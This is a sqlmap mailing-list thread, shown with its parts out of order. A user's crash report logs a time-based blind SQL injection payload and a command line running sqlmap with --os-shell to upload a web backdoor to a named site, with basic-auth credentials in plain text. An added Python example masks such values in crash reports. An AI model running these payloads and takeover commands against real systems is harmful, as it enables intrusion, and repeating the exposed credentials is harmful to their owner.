> Traceback (most recent call last):
>   File "C:\pentest\p\sqlmap.0.9-1\sqlmap.py", line 86, in main
>     start()
>   File "C:\pentest\p\sqlmap.0.9-1\lib\controller\controller.py", line 551, in start
>     action()
>   File "C:\pentest\p\sqlmap.0.9-1\lib\controller\action.py", line 139, in action
>     conf.dbmsHandler.osShell()
>   File "C:\pentest\p\sqlmap.0.9-1\plugins\generic\takeover.py", line 81, in osShell
>     self.initEnv(web=web)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\abstraction.py", line 151, in initEnv
>     self.webInit()
>   File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\web.py", line 240, in webInit
>     uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 278, in getPage
>     conn = urllib2.urlopen(req)
>   File "C:\Python27\lib\urllib2.py", line 126, in urlopen
>     return _opener.open(url, data, timeout)
>   File "C:\Python27\lib\urllib2.py", line 392, in open
>     response = self._open(req, data)
>   File "C:\Python27\lib\urllib2.py", line 410, in _open
>     '_open', req)
>   File "C:\Python27\lib\urllib2.py", line 370, in _call_chain
>     result = func(*args)
>   File "C:\Python27\lib\urllib2.py", line 1186, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "C:\Python27\lib\urllib2.py", line 1127, in do_open
>     h = http_class(host, timeout=req.timeout) # will parse host:port
>   File "C:\Python27\lib\httplib.py", line 681, in __init__
>     self._set_hostport(host, port)
>   File "C:\Python27\lib\httplib.py", line 706, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '80\'
>
> [*] shutting down at 18:55:15

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
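Miroslav's note about the broken "masking" logic is illustrated by the quoted report itself: the crash text that users are asked to mail to a public list carries the full command line, including --auth-cred and the target URL. The Python below is an added example of the kind of masking he describes; it is not sqlmap's implementation. --auth-cred and -u are the options named in his message, the remaining entries in SENSITIVE_OPTIONS are assumptions added to show the list is extensible, and the sample report, host and credentials are constructed placeholders.

```python
# Options whose values must never appear in a crash report. --auth-cred and
# -u are the ones named in the message above; the others are assumptions
# added here to show that the masking is driven by a list, not two cases.
SENSITIVE_OPTIONS = (
    "--auth-cred",
    "-u", "--url",
    "--cookie",
    "--data",
    "--proxy-cred",
)


def mask_value(value):
    """Replace a secret with a same-length run of '*', so the report still
    shows that something was there (and how long) without revealing it."""
    return "*" * len(value)


def mask_cmdline(cmdline):
    """Mask the values of sensitive options in a whitespace-separated command line.

    Handles '--opt=value', '--opt value' / '-u value', and the attached short
    form '-uvalue'. Splitting on whitespace rather than using shlex is
    deliberate: reports from Windows contain backslashes in paths that shlex
    would interpret as escapes.
    """
    masked = []
    hide_next = False
    for token in cmdline.split():
        if hide_next:
            masked.append(mask_value(token))
            hide_next = False
            continue
        # '--opt=value' form: keep the option name, hide the value
        name, sep, value = token.partition("=")
        if sep and name in SENSITIVE_OPTIONS:
            masked.append(name + "=" + mask_value(value))
            continue
        # '-uvalue' attached short form
        if token.startswith("-u") and not token.startswith("--") and len(token) > 2:
            masked.append("-u" + mask_value(token[2:]))
            continue
        masked.append(token)
        # '--opt value' form: hide the following token
        if token in SENSITIVE_OPTIONS:
            hide_next = True
    return " ".join(masked)


def mask_report(report):
    """Apply mask_cmdline to the 'Command line:' line of a crash report and
    leave every other line (version, OS, traceback) untouched."""
    out = []
    for line in report.splitlines():
        if line.startswith("Command line:"):
            prefix, _, rest = line.partition(":")
            out.append(prefix + ": " + mask_cmdline(rest))
        else:
            out.append(line)
    return "\n".join(out)


# Constructed sample report, shaped like the one quoted above but with a
# placeholder revision, host and credentials.
SAMPLE_REPORT = """sqlmap version: 1.0-dev (rNNNN)
Python version: 2.7.1
Operating system: nt
Command line: C:\\tools\\sqlmap.py -u http://target.invalid/video.php?n=1 --auth-type=basic --auth-cred=user:secret --os-shell
Technique: TIME"""


if __name__ == "__main__":
    print(mask_report(SAMPLE_REPORT))
```

Masking at the point where the report text is assembled, rather than relying on the user to redact before posting, is the design choice that matters: the quoted message shows what happens when that step silently stops working for a while.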
From: <nig...@em...> - 2011-06-29 17:05:49
I tried to upload the web backdoor with no knowledge of the web server document root. The result is a bug.

[18:52:39] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: n
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: n=-5351' OR 1181=SLEEP(5) AND 'DBAH'='DBAH&vurl=http://website.com/content/video16/001Ccmg.avi&cmd=altern
---

[18:52:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.6
back-end DBMS: MySQL 5
[18:52:39] [INFO] going to use a web backdoor for command prompt
[18:52:39] [INFO] fingerprinting the back-end DBMS operating system
[18:52:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[18:52:47] [INFO] the back-end DBMS operating system is Linux
[18:52:47] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[18:52:53] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[18:55:06] [INFO] retrieved web server full paths: '/members/video.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[18:55:15] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 1 times

[18:55:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4198), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4198)
Python version: 2.7.1
Operating system: nt
Command line: C:\pentest\p\sqlmap.0.9-1\sqlmap.py -u http://website.com/members/video.php?n=769&vurl=********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************** --auth-type=basic --auth-cred=mstier07:mstier --random-agent --retries=6 --level 5 --risk 3 --os-shell
Technique: TIME
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "C:\pentest\p\sqlmap.0.9-1\sqlmap.py", line 86, in main
    start()
  File "C:\pentest\p\sqlmap.0.9-1\lib\controller\controller.py", line 551, in start
    action()
  File "C:\pentest\p\sqlmap.0.9-1\lib\controller\action.py", line 139, in action
    conf.dbmsHandler.osShell()
  File "C:\pentest\p\sqlmap.0.9-1\plugins\generic\takeover.py", line 81, in osShell
    self.initEnv(web=web)
  File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\abstraction.py", line 151, in initEnv
    self.webInit()
  File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\web.py", line 240, in webInit
    uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 278, in getPage
    conn = urllib2.urlopen(req)
  File "C:\Python27\lib\urllib2.py", line 126, in urlopen
    return _opener.open(url, data, timeout)
  File "C:\Python27\lib\urllib2.py", line 392, in open
    response = self._open(req, data)
  File "C:\Python27\lib\urllib2.py", line 410, in _open
    '_open', req)
  File "C:\Python27\lib\urllib2.py", line 370, in _call_chain
    result = func(*args)
  File "C:\Python27\lib\urllib2.py", line 1186, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "C:\Python27\lib\urllib2.py", line 1127, in do_open
    h = http_class(host, timeout=req.timeout) # will parse host:port
  File "C:\Python27\lib\httplib.py", line 681, in __init__
    self._set_hostport(host, port)
  File "C:\Python27\lib\httplib.py", line 706, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '80\'

[*] shutting down at 18:55:15